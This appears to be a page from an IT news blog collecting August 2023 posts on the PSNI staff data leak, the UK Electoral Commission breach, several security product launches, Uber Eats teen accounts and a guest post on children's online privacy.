The Police Service of Northern Ireland REALLY Screws Up And Publishes The Data Of ALL ITS STAFF

Posted in Commentary with tags on August 9, 2023 by itnerd

The good news is that The Police Service Of Northern Ireland didn’t get pwned by hackers. But the bad news is they might as well have been. I say that because they really screwed up and accidentally published the data on all their staff creating a critical incident in the process:

The Police Service of Northern Ireland (PSNI) earlier apologised for the self-inflicted security breach after it inadvertently published the information in response to a Freedom of Information (FOI) request on Tuesday.

The breach involved the surname, initials, the rank or grade, the work location and departments of all PSNI staff, but did not involve the officers’ and civilians’ private addresses.

Alliance Party leader Naomi Long said it was a concern that a member of staff, who she understands to be “relatively junior”, had access to the sensitive data.

PSNI said its chief constable Simon Byrne is cutting his family holiday short to deal with the crisis and is expected to answer questions from politicians.

This is bad. This is very bad. Why is this bad? Here’s why:

The information, which was available online for up to three hours, revealed members of the organised crime unit, intelligence officers stationed at ports and airports, officers in the surveillance unit and almost 40 PSNI staff based at MI5’s headquarters in Holywood, the Belfast Telegraph reported.

Clearly there was no process in place to limit who has access to this data. Nor were there any checks to make sure that the data was safe to release. This is another one of those cases where heads need to roll over this because I cannot imagine what the members of this police service are going through knowing that some of their personal information is out there right now.

#EpicFail

1 Comment »

Vicarius Introduces vuln_GPT

Posted in Commentary with tags on August 9, 2023 by itnerd

Vicarius, developers of the industry’s first fully autonomous end-to-end vulnerability remediation platform, today announced the launch of vuln_GPT, the world’s first Large Language Model (LLM) model trained to generate remediation scripts for software vulnerabilities in the race to find and fix vulnerabilities faster than hackers. The vuln_GPT engine will be freely offered within vsociety, Vicarius’ social community for security researchers. vuln_GPT scripts can then easily be deployed as part of its vRx solution that allows instant remediation of vulnerabilities.

n the ever-evolving digital landscape, there are currently 200,000 vulnerabilities detected in total, with ten percent (10%) discovered in the last year and increasing at an exponential pace. Manually identifying and handling zero-days is a heavy burden, requiring significant daily manpower. In the recent MOVEit vulnerability example, almost 60 days after identifying the first vulnerability, a quarter of the affected organizations still remain vulnerable. The advent of the latest AI-driven cyber threats, such as WormGPT, make it even harder to detect and block these threats.

When it comes to vulnerability management solutions, legacy vendors lean heavily on the assessment and detection side of the house, but have failed to pay appropriate attention to the remediation aspect. Remediation is already a complex process, and security teams remain cautious when applying vendor patches in fear of causing outages or downtime to their systems. Even if a patch is available, they will often undergo a waiting period in order to minimize any potential risk.

Enter vuln_GPT. This new AI-powered remediation engine can automatically generate a remediation script to execute a number of actions. For example, scripts can remove a file, close a port, disable a protocol, or initiate a compensating control. These are all strategies that can provide a sturdy and reliable fix while vendors work on releasing a patch or while security teams test one in a lab environment. Further, because vuln_GPT works without human intervention, it also makes vulnerability detection and remediation faster and more cost effective, without the need for large research teams or highly skilled security engineers, saving time and money.

Recently, there were critical zero-day vulnerabilities discovered in Terrestrial Trunked Radio (TETRA), a radio communications protocol widely used by government, law enforcement and military organizations worldwide. While some of the vulnerabilities can be fixed through firmware updates, others can’t and are more difficult to mitigate, in particular a backdoor in CVE-2022-24402 that can expose sensitive information. Using vuln_GPT, Vicarius takes the manual work out of identifying and applying the most effective compensating controls.

With vuln_GPT, Vicarius ushers in the era of AI-generated scripts to mitigate CVEs and helps to significantly close the gap between detection and remediation. MTTD (mean time to detect) remains a prominent issue for IT teams, but MTTR presents an even bigger challenge, since most teams are not well equipped to fix vulnerabilities quickly.

vuln_GPT enables security teams to quickly fix critical issues, significantly decrease their time to react, cut down the costly aftermath of an incident, and reduce MTTD and MTTR. Vicarius believes the timing is right to help solve the skills gap, particularly when in-house research teams are short staffed and under-resourced.

Leave a comment »

Email threats continue to increase in first half of 2023: Trend Micro 

Posted in Commentary with tags on August 9, 2023 by itnerd

Today, Trend Micro released its midyear cybersecurity threat report, which found that in the first half of 2023, theTrend Micro blocked more than 85 billion threats globally consisting of email threats, malicious files, and malicious URLs, a 27% year-over-year increase.   

In Canada, the detection of attacks from ransomware-as-a-service surged in the first half of 2023. To date, Trend Micro has blocked 394,518,518 email threats attempts in Canada, 24.6% more than last year. 

As AI adoption continues to grow at a stable pace, ransomware groups will become more creative. Findings show Cyber criminals are turning to AI-enabled tools to simplify enacting scams, automate refining targets, and increase scalability with a crop of new crimes. 

You can read the full report here: Stepping Ahead of Risk: Trend Micro 2023 Midyear Cybersecurity Threat Report

Leave a comment »

Uber Eats is now available for teen accounts

Posted in Commentary with tags on August 9, 2023 by itnerd

Today, Uber Eats is now available for teen accounts—meaning parents and guardians now have one less thing to worry about. Whether their teen needs a meal to refuel after practice or brain food to help them through a study session, parents and guardians can relax knowing their teen has a way to feed themselves, even if they’re not around. 

How Uber Eats for teens work: 

  • Deliveries from highly rated delivery people: Orders through teen accounts will always be delivered by highly rated delivery people. 
  • Teen-friendly view: Age-restricted items like alcohol will be filtered out.

Here is what a regular account view looks like:

Here is what a teen account view looks like:

  • Live tracking and real-time alerts: Anytime an order is placed through a teen account, the parent or guardian will receive real-time status updates from pickup to drop off. 
  • Support at your fingertips: If for whatever reason something goes wrong, the parent or guardian and the teen will be able to submit a support ticket in the app. 

Teen accounts enabled by parents and guardians will now provide access to Uber Eats and Uber Rides.  Launched earlier this year, teen accounts with Rides are designed for families on the go with safety features built into the experience for parents/guardians, teenage riders, and drivers. When a teen requests a trip, parents/guardians will be notified, can watch the trip right in their Uber app, and contact their teen or the driver. In addition, Uber safety features – like audio recording, live trip tracking, and PIN Verification to help make sure your teen is getting in the right car – will be mandatory. Only highly rated, experienced drivers will be able to receive requests for trips with teens, and drivers can always choose to stop receiving these trip requests. In case of an emergency, parents/guardians will have the ability to call 911 directly from the trip tracker screen. 

Leave a comment »

The UK Electoral Commission Was Pwned And The Pwnage Was Not Immediately Disclosed To The Public

Posted in Commentary with tags on August 9, 2023 by itnerd

The UK’s Electoral Commission revealed that a cyber attack which allowed unknown threat actors the data of 40 million voters. It gets worse though. This pwnage went unnoticed for a year and was not disclosed to the public for an additional 10 months. 

The Electoral Commission apologized for the security breach in which the names and addresses of all voters registered between 2014 and 2022 were open to “hostile actors” as far back as August 2021. The attack was discovered last October and reported within 72 hours to the Information Commissioner’s Office (ICO), as well as the National Crime Agency. However, the public has only now been informed that the electoral registers containing the data of millions of voters may have been accessible throughout that time. 

The Electoral Commission said it was “not able to know conclusively” what information had been accessed. It is not known whether the attackers were linked to a hostile state, such as Russia, or a criminal cyber gang. The watchdog said “much of the data” was already in the public domain and insisted it would be difficult for anyone to influence the outcome of the UK’s largely paper-based electoral system, but it acknowledged that voters would still be concerned. 

The attackers were able to access full copies of the electoral registers, held by the commission for research purposes and to enable permissibility checks on political donations. These registers include the name and address of anyone in the UK who was registered to vote between 2014 and 2022. The commission’s email system was also accessible during the attack. The full register held by the Electoral Commission contains name and address data that can be inspected by the public but only locally through electoral registration officers, with only handwritten notes allowed. The information is not permitted to be used for commercial or marketing purposes. The data of anonymous voters whose details are private for safety reasons and the addresses of overseas voters were not accessible to the intruders in the IT system. 

All together now…. Whiskey Tango Foxtrot????

This is an epic screw up and heads need to roll over it because it is totally unacceptable that data on 40 million people is out there in the hands of someone to do whatever nefarious things they plan on doing with it. Apologies are not enough. Actions to ensure that this never happens again along with having those who let this happen pay the price are the only way to stop epic screw ups like this going forward.

Leave a comment »

Appdome Launches Cyber Community Program with Pen Testers Around the World

Posted in Commentary with tags on August 9, 2023 by itnerd

Appdome, the one-stop shop for mobile app defense, today announced the launch of its new Mobile App Defense Project, a community program aimed at improving mobile DevSecOps through collaboration with more than 50 renowned mobile app penetration testers around the world. This initiative aims to foster a more secure mobile app economy, raise the bar on mobile app defense and provide rapid, validated, continuous cyber and anti-fraud solutions for all mobile applications globally.

As mobile application use and revenues continue to rise dramatically, mobile application security testing has become a hot topic and fast emerging discipline in the economic landscape. Cyber threats, attacks, tools, methods, and techniques targeting Android & iOS apps, infrastructures and users continue to evolve and proliferate. The Mobile App Defense Project is designed to harness the collective strength of the global pen testing community to provide cutting-edge cybersecurity, anti-fraud, anti-malware and other solutions in mobile applications worldwide.  

Through this program, Appdome will collaborate and share research with leading mobile app penetration testing companies, renowned for their expertise in identifying exploits, vulnerabilities and conducting rigorous security assessments of Android & iOS applications. Appdome will also integrate the recommendations provided by these partners into Appdome’s cyber defense automation platform to deepen and accelerate mobile app defenses for all mobile brands.  

As a community project, Appdome will also contribute cyber and threat research to the community as well as fund education, awareness, and other programs to benefit mutual customers and the broad cyber community defending mobile brands, businesses, and users.  

Some of the founding members of the Mobile App Defense Project include:

Leave a comment »

Guest Post: Online Identity & Privacy Protection Tips For Children

Posted in Commentary with tags on August 9, 2023 by itnerd

By Ani Chaudhuri, CEO, Dasera

Beyond the usual guidelines, there are several innovative and layered approaches that parents might not have considered:

  • Digital Footprint Starts at Birth: Avoid sharing identifiable information about your child on public platforms. This includes full names, birth dates, and locations. A harmless birth announcement can offer malicious actors a starting point.
  • Rethink “Smart” Toys: Before purchasing, scrutinize the data handling practices of internet-connected toys. Many collect vast amounts of information, and not all have stringent security measures.
  • Understand School Data Handling: Engage with your child’s school to understand how they store, use, and protect student data. Often, educational platforms have data vulnerabilities or share information with third parties.
  • Voice-Activated Devices: Devices like Siri or Alexa constantly listen for activation cues. Ensure they aren’t inadvertently recording your child’s conversations or information.
  • Online Gaming: Even games designed for younger children can have chat features. Ensure these are disabled or monitored. Personal information can be unintentionally shared during seemingly innocent in-game conversations.

From the moment they are born. It may sound extreme, but children have a digital identity almost from birth in our current digital era. Whether it’s hospital records, pediatrician visits, or the first photo shared on social media, their digital footprint begins immediately. Each of these instances carries data – a golden ticket for identity thieves. Protecting a child’s ID isn’t just about preventing financial fraud; it’s about safeguarding their entire digital existence and future reputation.

Child ID and privacy isn’t just about what parents should do; it’s equally about the don’ts and nevers:

  • Never Use Their Name for Passwords: Using a child’s name or birthdate as a password for any online service is a glaring risk. It’s often the first thing hackers will try.
  • Don’t Overlook Data Breaches: Not all data breaches make headlines. Watch for breaches involving services your child uses and act accordingly.
  • Never Assume a Platform is Safe: Just because a platform is designed for children doesn’t mean it’s secure. Constantly scrutinize its data practices.
  • Don’t Underestimate Word of Mouth: Children learn much from their peers. Educate them about the basics of data privacy so they can be advocates among their friends.

Protecting a child’s ID and privacy in today’s world requires vigilance, continuous education, and proactive measures. It’s not just about today’s threats but also about preventing potential risks in the future. Parents must be the first line of defense, even if it means challenging the status quo of digital interaction.

Leave a comment »

Guest Post: Supercharging Investigations With Cado’s New Timeline 

Posted in Commentary with tags on August 9, 2023 by itnerd

While many organizations have doubled down on cloud security in recent years, most still wrestle with closing the gap between detection and response. Once malicious activity has been identified, it can feel nearly impossible to understand the true scope and impact. 

When it comes to incident response, the more data sources you can analyze in aggregate, the better your investigation will be; however, this isn’t easy – especially in the case of complex, multi-cloud environments. In Azure alone there are over 200 products and services, each with their own set of best practices and data sources. Each cloud provider has their own terminology, security tools, monitoring logs, and APIs, making it extremely difficult for analysts to know which data sources are most valuable to capture, how to capture them, and moreover, how to best investigate them. 

Naturally, security teams have attempted to apply legacy investigation tools and processes to the cloud, but deep-dive investigations are still too complicated and time consuming. In many cases, analysts need to use a patchwork of legacy and open-source tools and resort to spreadsheets to piece together an investigation. Worse, due to the amount of time and resources required to perform forensics in the cloud, security teams often don’t have the cycles to do an investigation as frequently as they feel is necessary, leaving the organization vulnerable to risk. 

Cado’s mission is to provide security teams with a faster and smarter way to perform forensics investigations in the cloud. The Cado platform harnesses automation at its core to expedite the end-to-end incident response process. When it comes to the investigation itself, the platform automatically presents key incident details including a full timeline of events, saving analysts weeks of time that would have been spent in spreadsheets. Cado’s timeline feature provides analysts with a unified view of hundreds of data sources across cloud-provider logs, disk, memory and more. Further, the Cado timeline supports cross-cloud evidence items to be viewed in a single pane of glass in cases where an incident spans multiple public cloud environments. This level of contextual awareness is vital in understanding the impact and scope of an incident. 

As part of this latest product release, Cado has introduced additional enhancements to its timeline feature to help security teams further supercharge investigations and reduce Mean Time To Response (MTTR). Here’s an overview of the most recently released timeline functionality:

New Timeline View

Cado is excited to have revamped the look and feel of the timeline feature so that it is more intuitive to navigate and pivot off key artifacts during an investigation. From card view to a powerful tabular view, we hope this will greatly streamline the analysis process. This new view also aligns with our mission to make forensics more approachable so that analysts of all levels can perform incident response in the cloud. 

Cado is excited to have revamped the look and feel of the timeline feature so that it is more intuitive to navigate and pivot off key artifacts during an investigation. From card view to a powerful tabular view, we hope this will greatly streamline the analysis process. This new view also aligns with our mission to make forensics more approachable so that analysts of all levels can perform incident response in the cloud. 

Faceted Search

Faceted search will allow users to narrow down their search results quickly using facet options, which represent categories of data. The facet options Cado presents will provide awareness to the user on the core data types/ attributes the events contain, enabling them to refine datasets quickly and efficiently using the facet navigation, rather than having to add filters to their query in the search bar manually, which can burden the user. 

Saved Search

Saved search will allow users to save investigation queries for re-use at a later date. During an investigation, particularly in the earlier analysis phases, a user will be exploring and pivoting across datasets and will have naturally built-up a considerable query in the search bar. Users can now preserve this query so they can re-execute it on their next session (or even share it with colleagues). This feature will save precious investigation time by not having to rebuild a query from scratch, thus enabling rapid search and visibility.

If you’re interested in learning more, reach out to our team or take advantage of a 14-day free trial of the Cado platform! 

Leave a comment »

NetRise Introduces New Features for Managing SBOMs & CISA KEV Catalog Support  

Posted in Commentary with tags on August 9, 2023 by itnerd

NetRise, the company providing granular visibility into the world’s XIoT security problem, today announced advanced capabilities for maintaining and working with Software Bill of Materials (SBOMs) and support for the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) Catalog for managing and understanding the risks associated with software components in the firmware of connected devices. 

As the security of the software and firmware supply chain and regulation around SBOMs continue to dominate the industry landscape, the impact of consuming and generating a list of ‘ingredients’ for each device cannot be overstated. With the continuing push for new standards to require visibility in the supply chain, device consumers and asset owners need a solution to enable them to streamline SBOM management and vulnerability prioritization efforts.

NetRise recognizes the current challenges in the market, enhancing its customers’ and partners’ ability to manage vulnerabilities effectively, and offers the solution these industry personas have been seeking; the ability to ingest and enrich SBOMs from multiple sources. This key capability helps device manufacturers and owners alike better manage the underlying components and vulnerabilities of XIoT devices. 

With the growing prominence of KEVs, NetRise’s adoption of CISA’s KEV data provides users with an efficient method for prioritizing the most exploitable vulnerabilities. Today, a typical enterprise sorts through potentially hundreds of thousands of vulnerabilities, and the ability to prioritize remediation efforts based on exploitability alters the dynamics of device security. In 2022, about 30% of KEVs affected XIoT devices or software components used by XIoT devices. So far, in 2023, that figure is approximately 20%. Considering that any CVE could be on the KEV list, these are impressive numbers. 

Key benefits of these new features in the NetRise Platform include:

  • By overlaying CISA KEV catalog data, NetRise empowers a comprehensive understanding of known exploits to identify, address, and prioritize the most critical vulnerabilities.
  • The NetRise platform supports the ingestion of two major SBOM formats (SPDX and CycloneDX), enriches them with vulnerability information, and exports in either format for external use.
  • With a dark mode feature to minimize eye strain and enhance visibility in glare-prone environments, NetRise delivers an innovative interface design for improved user experience. 

For more information about NetRise’s presence at Black Hat USA 2023, please visit https://www.netrise.io/events. To learn more about these advancements and other capabilities of the NetRise platform, visit https://www.netrise.io/platform 

Leave a comment »

Google Canada commits $2.5 million to NPower Canada 

Posted in Commentary with tags on August 9, 2023 by itnerd

Today, Google Canada announced a $2.5 million commitment to NPower Canada, unlocking the opportunity to offer 5,000 needs-based scholarships to underserved job-seekers across Canada, to gain the skills required to access careers in tech.

The grant enables NPower Canada to integrate and deliver Google Career Certificates in both English and French as a core component of its workforce development programs. Google.org has been supporting NPower Canada since 2020, and prior to today, Google has committed close to $5 million to NPower Canada, which has helped over 4,000 underserved and financially barriered job seekers enroll in NPower Canada’s scholarship-based programs.

Here’s two examples of people who benefitted from this initiative:

  • Olena Kotelnykova, Financial Clerk, the Town of Berwick- Berwick,Nova Scotia: Olena graduated from NPower Canada’s Junior IT Analyst program in January 2023 after making the difficult decision to migrate to Canada to escape the war in Ukraine. After arriving in Canada, she discovered NPower’s program which gave her the skills and experience to secure a role as a Financial Clerk at the Town of Berwick within three months of participating. The program not only gave her the expertise, but provided her with a strong community to lean on as she built her new life in Canada.
  • Han Hyung Lee, Customer Account Specialist, Shaw Communications – Vancouver, British Columbia: Originally from Hong Kong and seeking new opportunities overseas, Han struggled to land a job despite his previous experience. This inspired him to enroll in the program with NPower Canada. With guidance, he was able to overcome barriers in his job search and integrate himself into the IT community in Vancouver. Han graduated from NPower’s Junior IT Analyst Program with a Google IT Support Professional Certificate that helped him land a role as a Customer Account Specialist with Shaw Communications. 

 More information can be found in Google’s press release and blog post.

Leave a comment »

« Older Entries
Newer Entries »